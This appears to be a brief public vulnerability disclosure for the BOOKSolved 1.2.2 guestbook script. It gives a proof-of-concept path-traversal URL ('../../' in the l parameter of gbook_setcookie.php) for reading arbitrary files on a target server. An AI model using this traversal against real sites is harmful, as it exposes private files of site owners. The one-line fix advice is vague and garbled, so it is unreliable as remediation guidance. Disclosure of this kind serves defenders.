31 lines
No EOL
863 B
Text
31 lines
No EOL
863 B
Text
...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability
|
|
|
|
...Discovered by bd0rk
|
|
|
|
...Contact: bd0rk[at]hackermail.com or follow me on twitter
|
|
|
|
...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King
|
|
|
|
...Tested on: Ubuntu-Linux
|
|
|
|
...MEZ-Time: 08:17
|
|
|
|
...Vendor: http://www.usolved.net/
|
|
|
|
...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Description: Found vulnerable code in gbook_setcookie.php line 7.
|
|
So an attacker can read in sensitive files about l-parameter.
|
|
|
|
|
|
bd0rk's-Fixtip: Percolate the l-parameter before $_GET
|
|
|
|
|
|
|
|
Greetings from Germany, the 22 years old bd0rk. |